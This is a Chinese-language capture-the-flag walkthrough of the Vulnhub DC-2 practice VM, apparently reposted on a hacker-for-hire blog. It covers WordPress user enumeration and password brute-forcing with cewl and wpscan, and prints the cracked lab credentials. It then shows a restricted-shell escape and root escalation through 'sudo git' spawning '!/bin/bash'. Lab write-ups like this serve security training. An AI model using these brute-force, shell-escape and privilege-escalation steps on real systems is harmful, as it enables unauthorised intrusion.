当前位置:首页 > 黑客技术 > 正文内容

Vulnhub靶机渗透测试之DC-2-WordPress

访客4年前 (2021-04-15)黑客技术1022

环境部署

攻击机kali:192.168.0.114

靶机dc-2:192.168.0.131

靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip

1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的)

2、解压会得到一个.ova的文件,然后在VMware中打开即可

3、虚拟机打开页面如下,一个登陆页面

信息收集

1、使用nmap进行扫描,发现dc-2靶机的ip为:192.168.0.131

2、继续扫描靶机的端口,可以看到开放了80端口和7744端口(在此端口上部署了ssh服务)

3、因为开放了80端口,所以在浏览器中访问:http://192.168.0.131:80,发现url变成了http://dc-2,很明显,DNS没有被解析。

4、再次查看一下nmap的扫描结果,发现如下结果,nmap给出了无法跟踪跳转到http://dc-2/,所以我们需要去添加hosts的地址

5、hosts文件所在路径

windows:C:\Windows\System32\drivers\etc\hosts

linux:/etc/hosts

我是在物理机访问的dc-2靶场,所以就在我的物理机上的hosts文件中添加了:192.168.0.131 dc-2 解析

在linux中也是在hosts文件添加:192.168.0.131 dc-2,如下:

6、然后再次访问:http://192.168.0.131:80,是一个wordpress的界面。

7、找到第一个flag1

8、提示翻译过来如下

爆破账户名和密码

密码生成

1、提示我们需要一个用户名来登录,而且其中有一个关键字:cewl(kali自带这个工具),这是一个linux的字典生成工具,最大的特点就是能够爬取网站的信息并生成字典。

使用cewl来爬取网站并生成密码字典

cewl http://dc-2/ -w dc-2.txt #生成字典

wc -l dc-2.txt #查看字典中有多少行

扫描用户名账号

1、因为网站是wordpress,所以采用wpscan来扫描

wpscan --url dc-2? -e u #扫描出网站的用户名

发现了3个账号:admin、jerry、tom

开始爆破

1、使用之前获取的三个用户名和cewl工具生成的字典的来爆破

dc-2-user.txt文件:存放用户名? ?dc-2.txt:存放密码

wpscan --url http://dc-2/-U dc-2-user.txt -P dc-2.txt

成功爆出jerry和tom的密码:

jerry/adipiscing
tom/parturient

2、登录后台,wordpress默认后台路径是:/wp-login.php,访问后台登录界面

使用jerry用户登录(使用tom登录没有什么有用的信息)

3、点击Pages按钮,查看到flag2,查看flag2

翻译过来为:

此时我们只能从另外一个入口来寻找flag了。

ssh登录靶机

1、使用之前爆破的用户名和密码来登录

jerry/adipiscing
tom/parturient

使用jerry登录,被拒绝登录了,只能使用tom用户登录

2、虽然登陆了ssh登录成功,但是无法使用cat或者vim查看flag3

绕过rbash

1、查看环境变量,发现只有4个命令可以使用

2、即我们获取到的shell为:Restricted shell(受限制的shell),可以添加环境变量来绕过

#绕过rbash

BASH_CMDS[a]=/bin/sh;a


#添加环境变量

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

3、成功读取flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

翻译:可怜的老汤姆总是追随杰里。也许他应该承受自己造成的所有压力。

线索指向了jerry,提示使用su切换用户

4、使用su jerry切换为jerry用户,密码为之前获取的密码,成功读取flag4


提示为git,应该是使用git提权

git提权

1、查看jerry可以以root用户的身份执行git命令而且还不需要密码

2、提权

方法1:

sudo git -p help #强制进入交互状态

!/bin/bash #打开一个用户为root的shell


方法2:

sudo git help config #在末行命令模式输入

!/bin/bash 或者 !'sh' #打开一个用户为root的shell

成功获取到最后一个flag

知识点总结

1、wordpress的后台登陆点以及域名解析

2、cewl工具和wpscan工具的使用

3、su命令切换用户

4、git提权

参考文章

http://akevin.cn/index.php/archives/572/

https://blog.csdn.net/weixin_44288604/article/details/108032112

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/106015.html

分享给朋友:
返回列表

上一篇:http头注入

下一篇:qq消息免费恢复软件(qq消息记录恢复软件)

“Vulnhub靶机渗透测试之DC-2-WordPress” 的相关文章

天猫双十一购物津贴使用规则

每年的双十一玩法都有更新,玩法是越来越多,但仍保留了一些经典玩法,比如购物津贴。那么购物津贴是什么意思呢?天猫双十一购物津贴使用规则是什么?双十一购物津贴可以与哪些优惠叠加?双11购物津贴面值多少元?一起来了解一下吧!    ...

天猫双十一活动什么时候开始华流

以前提到双十一那都是光棍才过的节日,而现在双十一摇身一变成了全民购物狂欢节。在双十一期间以淘宝天猫为主的购物平台都会推出各种优惠活动以及满减折扣,可以算得上是全年最便宜的时候了。那么天猫双十一活动什么时候开始呢?下面就跟百思特小编来详细了解一下2020年天猫双十一开始时间吧!...

华流年京东618怎么买便宜

京东618活动已经在火热进行中的哦,各位有买什么东西了吗?很多小伙伴在活动一开始的时候就迫不及待的买了很多东西了,还有些小伙伴还很犹豫不知道买啥,接下来百思特小编就来教教大家2020年京东618怎么便宜吧~ 京东618怎么买便宜 活动时...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

Qq邮箱被黑客攻击怎么办,网络游戏提款难找黑客,电脑被黑客入侵修改开机密码

self.python_version = int(str(entry.name)[6:8])在曩昔的几年里,当局现已开端在冲击暗网中的网络违法活动了,其间包含优待儿童、违禁药品买卖、兵器出售、数据出售、勒索软件和黑客论坛等等。 近年来,大型网络违法商场逐步式微,尤其是在欧洲和美国当局在上一年打掉了...

评论列表

拥嬉莺时
拥嬉莺时
2年前 (2022-07-07)

下:6、然后再次访问:http://192.168.0.131:80,是一个wordpress的界面。7、找到第一个flag18、提示翻译过来如下爆破账户名和密码密码生成1、提示我们需要一个用户名来登录,而且其中有一个关键字:cewl

回复该评论
莣萳折奉
莣萳折奉
2年前 (2022-07-07)

s按钮,查看到flag2,查看flag2翻译过来为:此时我们只能从另外一个入口来寻找flag了。ssh登录靶机1、使用之前爆破的用户名和密码来登录jerry/adipiscingtom/parturient使用jerry登录,被拒绝登录

回复该评论
竹祭木白
竹祭木白
2年前 (2022-07-07)

查看flag3绕过rbash1、查看环境变量,发现只有4个命令可以使用2、即我们获取到的shell为:Restricted shell(受限制的shell),可以添加环境变量来绕过#绕过rbashBASH_CMDS[a]=/bin/sh;a#添加环境变量export

回复该评论

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright Your WebSite.Some Rights Reserved.